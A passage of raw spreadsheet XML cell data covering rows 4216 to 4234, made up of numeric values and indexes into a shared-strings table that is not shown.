      <c r="Q4216" s="12">
        <v>3.13</v>
      </c>
      <c r="R4216" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4216" s="12" t="s">
        <v>27100</v>
      </c>
      <c r="T4216" s="12" t="s">
        <v>27101</v>
      </c>
      <c r="U4216" s="12" t="s">
        <v>27102</v>
      </c>
      <c r="V4216" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4216" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4216" s="12">
        <v>9</v>
      </c>
      <c r="Y4216" s="12" t="s">
        <v>27103</v>
      </c>
    </row>
    <row r="4217" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4217" s="12">
        <v>69541</v>
      </c>
      <c r="B4217" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4217" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4217" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4217" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4217" s="12" t="s">
        <v>27104</v>
      </c>
      <c r="H4217" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4217" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4217" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4217" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4217" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4217" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4217" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4217" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4217" s="12">
        <v>3.13</v>
      </c>
      <c r="Q4217" s="12">
        <v>3.13</v>
      </c>
      <c r="R4217" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4217" s="12" t="s">
        <v>27105</v>
      </c>
      <c r="T4217" s="12" t="s">
        <v>27101</v>
      </c>
      <c r="U4217" s="12" t="s">
        <v>27106</v>
      </c>
      <c r="V4217" s="12" t="s">
        <v>26443</v>
      </c>
      <c r="W4217" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4217" s="12">
        <v>25</v>
      </c>
      <c r="Y4217" s="12" t="s">
        <v>27107</v>
      </c>
    </row>
    <row r="4218" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4218" s="12">
        <v>69611</v>
      </c>
      <c r="B4218" s="12" t="s">
        <v>30122</v>
      </c>
      <c r="D4218" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4218" s="12" t="s">
        <v>30123</v>
      </c>
      <c r="G4218" s="12" t="s">
        <v>27108</v>
      </c>
      <c r="H4218" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4218" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4218" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4218" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4218" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4218" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4218" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4218" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4218" s="12">
        <v>3.13</v>
      </c>
      <c r="Q4218" s="12">
        <v>3.13</v>
      </c>
      <c r="R4218" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4218" s="12" t="s">
        <v>27109</v>
      </c>
      <c r="T4218" s="12" t="s">
        <v>27110</v>
      </c>
      <c r="U4218" s="12" t="s">
        <v>27111</v>
      </c>
      <c r="V4218" s="12" t="s">
        <v>9751</v>
      </c>
      <c r="W4218" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4218" s="12">
        <v>8</v>
      </c>
      <c r="Y4218" s="12" t="s">
        <v>27112</v>
      </c>
    </row>
    <row r="4219" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4219" s="12">
        <v>69731</v>
      </c>
      <c r="B4219" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4219" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4219" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4219" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4219" s="12" t="s">
        <v>27119</v>
      </c>
      <c r="H4219" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4219" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4219" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K4219" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4219" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4219" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4219" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4219" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4219" s="12" t="s">
        <v>27120</v>
      </c>
      <c r="Q4219" s="12">
        <v>3.13</v>
      </c>
      <c r="R4219" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4219" s="12" t="s">
        <v>27121</v>
      </c>
      <c r="T4219" s="12" t="s">
        <v>27122</v>
      </c>
      <c r="U4219" s="12" t="s">
        <v>27123</v>
      </c>
      <c r="V4219" s="12" t="s">
        <v>16985</v>
      </c>
      <c r="W4219" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4219" s="12">
        <v>23</v>
      </c>
      <c r="Y4219" s="12" t="s">
        <v>27124</v>
      </c>
    </row>
    <row r="4220" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4220" s="12">
        <v>69821</v>
      </c>
      <c r="B4220" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C4220" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4220" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E4220" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4220" s="12" t="s">
        <v>30569</v>
      </c>
      <c r="G4220" s="12" t="s">
        <v>27125</v>
      </c>
      <c r="H4220" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4220" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4220" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4220" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4220" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4220" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4220" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4220" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4220" s="12" t="s">
        <v>27126</v>
      </c>
      <c r="Q4220" s="12">
        <v>3.13</v>
      </c>
      <c r="R4220" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4220" s="12" t="s">
        <v>27127</v>
      </c>
      <c r="T4220" s="12" t="s">
        <v>27128</v>
      </c>
      <c r="U4220" s="12" t="s">
        <v>27129</v>
      </c>
      <c r="V4220" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4220" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4220" s="12">
        <v>61</v>
      </c>
      <c r="Y4220" s="12" t="s">
        <v>27130</v>
      </c>
    </row>
    <row r="4221" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4221" s="12">
        <v>69831</v>
      </c>
      <c r="B4221" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4221" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4221" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4221" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4221" s="12" t="s">
        <v>27131</v>
      </c>
      <c r="H4221" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4221" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4221" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4221" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4221" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4221" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4221" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4221" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4221" s="12">
        <v>3.14</v>
      </c>
      <c r="Q4221" s="12">
        <v>3.14</v>
      </c>
      <c r="R4221" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4221" s="12" t="s">
        <v>27132</v>
      </c>
      <c r="T4221" s="12" t="s">
        <v>15431</v>
      </c>
      <c r="U4221" s="12" t="s">
        <v>27133</v>
      </c>
      <c r="V4221" s="12" t="s">
        <v>26469</v>
      </c>
      <c r="W4221" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4221" s="12">
        <v>28</v>
      </c>
      <c r="Y4221" s="12" t="s">
        <v>27134</v>
      </c>
    </row>
    <row r="4222" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4222" s="12">
        <v>70051</v>
      </c>
      <c r="B4222" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C4222" s="12" t="s">
        <v>31169</v>
      </c>
      <c r="D4222" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4222" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4222" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4222" s="12" t="s">
        <v>27140</v>
      </c>
      <c r="H4222" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4222" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4222" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4222" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4222" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4222" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4222" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4222" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4222" s="12" t="s">
        <v>27126</v>
      </c>
      <c r="Q4222" s="12">
        <v>3.13</v>
      </c>
      <c r="R4222" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4222" s="12" t="s">
        <v>27141</v>
      </c>
      <c r="T4222" s="12" t="s">
        <v>27142</v>
      </c>
      <c r="U4222" s="12" t="s">
        <v>27143</v>
      </c>
      <c r="V4222" s="12" t="s">
        <v>3916</v>
      </c>
      <c r="W4222" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4222" s="12">
        <v>7</v>
      </c>
      <c r="Y4222" s="12" t="s">
        <v>27144</v>
      </c>
    </row>
    <row r="4223" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4223" s="12">
        <v>70241</v>
      </c>
      <c r="B4223" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4223" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4223" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4223" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="G4223" s="12" t="s">
        <v>27145</v>
      </c>
      <c r="H4223" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4223" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4223" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4223" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4223" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4223" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4223" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4223" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4223" s="12">
        <v>3.14</v>
      </c>
      <c r="Q4223" s="12">
        <v>3.14</v>
      </c>
      <c r="R4223" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4223" s="12" t="s">
        <v>27146</v>
      </c>
      <c r="T4223" s="12" t="s">
        <v>27147</v>
      </c>
      <c r="U4223" s="12" t="s">
        <v>27148</v>
      </c>
      <c r="V4223" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4223" s="12" t="s">
        <v>27149</v>
      </c>
      <c r="X4223" s="12">
        <v>106</v>
      </c>
      <c r="Y4223" s="12" t="s">
        <v>27150</v>
      </c>
    </row>
    <row r="4224" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4224" s="12">
        <v>70551</v>
      </c>
      <c r="B4224" s="12" t="s">
        <v>30388</v>
      </c>
      <c r="C4224" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4224" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4224" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F4224" s="12" t="s">
        <v>30392</v>
      </c>
      <c r="G4224" s="12" t="s">
        <v>27151</v>
      </c>
      <c r="H4224" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4224" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4224" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4224" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4224" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4224" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4224" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4224" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4224" s="12" t="s">
        <v>27152</v>
      </c>
      <c r="Q4224" s="12">
        <v>3.12</v>
      </c>
      <c r="R4224" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4224" s="12" t="s">
        <v>27153</v>
      </c>
      <c r="T4224" s="12" t="s">
        <v>27154</v>
      </c>
      <c r="U4224" s="12" t="s">
        <v>27155</v>
      </c>
      <c r="V4224" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4224" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4224" s="12">
        <v>21</v>
      </c>
      <c r="Y4224" s="12" t="s">
        <v>27156</v>
      </c>
    </row>
    <row r="4225" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4225" s="12">
        <v>70571</v>
      </c>
      <c r="B4225" s="12" t="s">
        <v>31147</v>
      </c>
      <c r="D4225" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4225" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4225" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4225" s="12" t="s">
        <v>27157</v>
      </c>
      <c r="H4225" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4225" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4225" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4225" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4225" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4225" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4225" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4225" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4225" s="12">
        <v>3.13</v>
      </c>
      <c r="Q4225" s="12">
        <v>3.13</v>
      </c>
      <c r="R4225" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4225" s="12" t="s">
        <v>27158</v>
      </c>
      <c r="T4225" s="12" t="s">
        <v>16985</v>
      </c>
      <c r="U4225" s="12" t="s">
        <v>27159</v>
      </c>
      <c r="V4225" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4225" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4225" s="12">
        <v>1</v>
      </c>
      <c r="Y4225" s="12" t="s">
        <v>27160</v>
      </c>
    </row>
    <row r="4226" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4226" s="12">
        <v>70891</v>
      </c>
      <c r="B4226" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4226" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4226" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4226" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4226" s="12" t="s">
        <v>27161</v>
      </c>
      <c r="H4226" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4226" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4226" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K4226" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4226" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4226" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4226" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4226" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4226" s="12">
        <v>3.12</v>
      </c>
      <c r="Q4226" s="12">
        <v>3.12</v>
      </c>
      <c r="R4226" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4226" s="12" t="s">
        <v>27162</v>
      </c>
      <c r="T4226" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="U4226" s="12" t="s">
        <v>27163</v>
      </c>
      <c r="V4226" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4226" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4226" s="12">
        <v>106</v>
      </c>
      <c r="Y4226" s="12" t="s">
        <v>27164</v>
      </c>
    </row>
    <row r="4227" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4227" s="12">
        <v>72361</v>
      </c>
      <c r="B4227" s="12" t="s">
        <v>31147</v>
      </c>
      <c r="D4227" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4227" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4227" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4227" s="12" t="s">
        <v>27170</v>
      </c>
      <c r="H4227" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4227" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4227" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4227" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4227" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4227" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4227" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4227" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4227" s="12" t="s">
        <v>27171</v>
      </c>
      <c r="Q4227" s="12">
        <v>3.13</v>
      </c>
      <c r="R4227" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4227" s="12" t="s">
        <v>27172</v>
      </c>
      <c r="T4227" s="12" t="s">
        <v>27173</v>
      </c>
      <c r="U4227" s="12" t="s">
        <v>27174</v>
      </c>
      <c r="V4227" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="W4227" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4227" s="12">
        <v>13</v>
      </c>
      <c r="Y4227" s="12" t="s">
        <v>27175</v>
      </c>
    </row>
    <row r="4228" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4228" s="12">
        <v>72471</v>
      </c>
      <c r="B4228" s="12" t="s">
        <v>31147</v>
      </c>
      <c r="D4228" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4228" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4228" s="12" t="s">
        <v>31170</v>
      </c>
      <c r="G4228" s="12" t="s">
        <v>27176</v>
      </c>
      <c r="H4228" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4228" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4228" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4228" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4228" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4228" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4228" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4228" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4228" s="12" t="s">
        <v>27177</v>
      </c>
      <c r="Q4228" s="12">
        <v>3.14</v>
      </c>
      <c r="R4228" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4228" s="12" t="s">
        <v>27178</v>
      </c>
      <c r="T4228" s="12" t="s">
        <v>27179</v>
      </c>
      <c r="U4228" s="12" t="s">
        <v>27155</v>
      </c>
      <c r="V4228" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4228" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4228" s="12">
        <v>20</v>
      </c>
      <c r="Y4228" s="12" t="s">
        <v>27180</v>
      </c>
    </row>
    <row r="4229" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4229" s="12">
        <v>72491</v>
      </c>
      <c r="B4229" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4229" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4229" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4229" s="12" t="s">
        <v>30768</v>
      </c>
      <c r="G4229" s="12" t="s">
        <v>27181</v>
      </c>
      <c r="H4229" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4229" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4229" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4229" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4229" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4229" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4229" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4229" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4229" s="12" t="s">
        <v>27182</v>
      </c>
      <c r="Q4229" s="12">
        <v>3.13</v>
      </c>
      <c r="R4229" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4229" s="12" t="s">
        <v>27183</v>
      </c>
      <c r="T4229" s="12" t="s">
        <v>27184</v>
      </c>
      <c r="U4229" s="12" t="s">
        <v>27185</v>
      </c>
      <c r="V4229" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4229" s="12">
        <v>84911</v>
      </c>
      <c r="X4229" s="12">
        <v>13</v>
      </c>
      <c r="Y4229" s="12" t="s">
        <v>27186</v>
      </c>
    </row>
    <row r="4230" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4230" s="12">
        <v>72601</v>
      </c>
      <c r="B4230" s="12" t="s">
        <v>31347</v>
      </c>
      <c r="C4230" s="12" t="s">
        <v>31362</v>
      </c>
      <c r="D4230" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4230" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4230" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4230" s="12" t="s">
        <v>27193</v>
      </c>
      <c r="H4230" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4230" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4230" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4230" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4230" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4230" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4230" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4230" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4230" s="12">
        <v>3.13</v>
      </c>
      <c r="Q4230" s="12">
        <v>3.13</v>
      </c>
      <c r="R4230" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4230" s="12" t="s">
        <v>27194</v>
      </c>
      <c r="T4230" s="12" t="s">
        <v>27195</v>
      </c>
      <c r="U4230" s="12" t="s">
        <v>27196</v>
      </c>
      <c r="V4230" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4230" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4230" s="12">
        <v>95</v>
      </c>
      <c r="Y4230" s="12" t="s">
        <v>27197</v>
      </c>
    </row>
    <row r="4231" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4231" s="12">
        <v>73911</v>
      </c>
      <c r="B4231" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4231" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4231" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4231" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="G4231" s="12" t="s">
        <v>27203</v>
      </c>
      <c r="H4231" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4231" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4231" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4231" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4231" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4231" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4231" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4231" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4231" s="12" t="s">
        <v>27204</v>
      </c>
      <c r="Q4231" s="12">
        <v>3.13</v>
      </c>
      <c r="R4231" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4231" s="12" t="s">
        <v>27205</v>
      </c>
      <c r="T4231" s="12" t="s">
        <v>27206</v>
      </c>
      <c r="U4231" s="12" t="s">
        <v>27207</v>
      </c>
      <c r="V4231" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4231" s="12">
        <v>74131</v>
      </c>
      <c r="X4231" s="12">
        <v>70</v>
      </c>
      <c r="Y4231" s="12" t="s">
        <v>27208</v>
      </c>
    </row>
    <row r="4232" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4232" s="12">
        <v>74371</v>
      </c>
      <c r="B4232" s="12" t="s">
        <v>30361</v>
      </c>
      <c r="D4232" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4232" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4232" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4232" s="12" t="s">
        <v>27209</v>
      </c>
      <c r="H4232" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4232" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4232" s="12" t="s">
        <v>2488</v>
      </c>
      <c r="K4232" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4232" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4232" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4232" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4232" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4232" s="12" t="s">
        <v>27210</v>
      </c>
      <c r="Q4232" s="12">
        <v>3.14</v>
      </c>
      <c r="R4232" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4232" s="12" t="s">
        <v>27211</v>
      </c>
      <c r="T4232" s="12" t="s">
        <v>27212</v>
      </c>
      <c r="U4232" s="12" t="s">
        <v>27213</v>
      </c>
      <c r="V4232" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4232" s="12">
        <v>74831</v>
      </c>
      <c r="X4232" s="12">
        <v>30</v>
      </c>
      <c r="Y4232" s="12" t="s">
        <v>27214</v>
      </c>
    </row>
    <row r="4233" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4233" s="12">
        <v>74591</v>
      </c>
      <c r="B4233" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4233" s="12" t="s">
        <v>31171</v>
      </c>
      <c r="D4233" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4233" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4233" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4233" s="12" t="s">
        <v>27215</v>
      </c>
      <c r="H4233" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4233" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4233" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4233" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4233" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4233" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4233" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4233" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4233" s="12" t="s">
        <v>27216</v>
      </c>
      <c r="Q4233" s="12">
        <v>3.14</v>
      </c>
      <c r="R4233" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4233" s="12" t="s">
        <v>27217</v>
      </c>
      <c r="T4233" s="12" t="s">
        <v>27218</v>
      </c>
      <c r="U4233" s="12" t="s">
        <v>27219</v>
      </c>
      <c r="V4233" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4233" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4233" s="12">
        <v>22</v>
      </c>
      <c r="Y4233" s="12" t="s">
        <v>27220</v>
      </c>
    </row>
    <row r="4234" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4234" s="12">
        <v>75541</v>
      </c>
      <c r="B4234" s="12" t="s">
        <v>31325</v>
      </c>
      <c r="C4234" s="12" t="s">
        <v>31363</v>
      </c>
      <c r="D4234" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4234" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4234" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4234" s="12" t="s">
        <v>27227</v>
      </c>
      <c r="H4234" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4234" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4234" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4234" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4234" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4234" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4234" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4234" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4234" s="12" t="s">
        <v>27228</v>
      </c>
